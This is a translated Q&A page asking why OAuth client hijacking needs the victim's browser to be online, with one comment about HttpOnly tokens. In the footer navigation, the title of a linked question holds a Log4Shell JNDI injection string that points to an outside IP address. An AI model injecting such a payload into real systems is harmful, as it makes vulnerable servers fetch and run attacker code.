为什么客户端劫持仅在浏览器在线时有效?

Why does client hijacking only works while the browser is online?

提问人:Tyrannogina 提问时间:9/6/2023 更新时间:9/6/2023 访问量:14

问:

我正在阅读基于浏览器的应用程序的 OAuth 2.0 草案,并进入了邮件列表的讨论。在电子邮件中,有这样一段文字:

声明使用被盗令牌与通过 用户浏览器中受损的客户端(客户端劫持)是 绝对错误。以下是两个具体区别:

被盗的刷新令牌使攻击者能够以 用户。客户端劫持只有在用户的浏览器 联机,客户端有效运行。被盗的访问令牌 向攻击者授予对接受的任何资源服务器的不受限制的访问权限 它。客户端劫持迫使攻击者遵守 客户。例如,攻击者可以用伪造的令牌滥用被盗的令牌 origin 标头来访问将接受 令牌,但有一个 CORS 策略,该策略拒绝来自客户端的 起源

为什么如果没有运行客户端的在线浏览器,客户端劫持就无法进行?据我从客户端劫持中了解到,这意味着攻击者能够从受害者那里窃取浏览器上的会话。难道他们不能在其他地方利用这个会话进行恶意行为吗?

安全 OAuth 网络安全 客户端攻击

评论

0赞 Evert 9/6/2023
这个想法是,通过客户端劫持,他们可以在受害者浏览器中运行代码,但他们无法直接访问令牌。也许令牌位于 HttpOnly cookie 中。

答: 暂无答案

上一个:网站攻击:${jndi:ldap:/93.95.216.134:1389/Exploit}

下一个:网络被黑 - 我是否受到影响